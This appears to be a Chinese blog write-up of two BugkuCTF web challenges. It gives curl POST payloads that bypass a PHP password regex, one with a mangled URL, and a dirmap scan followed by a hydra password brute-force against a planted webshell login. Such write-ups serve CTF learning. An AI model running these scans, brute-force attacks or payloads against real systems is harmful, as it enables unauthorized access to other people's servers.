updated:

BugkuCTF-Web(3)


一.题目如下(月度最沙雕题目)

注意题中的正则表达式涉及到POISX Bracket Expressions

法一:

可以看到,出题人忘了执行isset判断password是否为null,因此本题最简单的payload如下

1
curl -X POST http://123.206.87.240:9009/21.php

这样可以直接解决。让password为任意一个不多于12个字符的字符串也可以解决问题。

下面我们试试正常的方法。

法二:

直接根据正则表达式构造(来自于大佬的wp)

payload:

1
curl -X POST -d "password=42.000000000000e-0" http:/7.240:9009/21.php

然而迷惑的事情来了,这样输出的结果就是$flag

迷惑至极=-=,只好按第一种方法了。

二.题目如下

1
http://123.206.87.240:8002/webshell/

先扫一下网站后台

1
dirmap -i http://123.206.87.240:8002/webshell/shell.php -lcf

发现webshell的位置

发现登陆界面,抓包发现网页使用post方法提交数据,使用hydra工具进行弱口令爆破

1
hydra -l %00 -P webshellpasswords.dict -s 8002 123.206.87.240 http-post-form "/webshell/shell.php:user=^USER^&pass=^PASS^:*不是自己的马不要乱骑!*"

拿到密码是hack,登陆即可得到flag。


← Prev 使用clang创建和使用动态库 | BugkuCTF-Web(2) Next →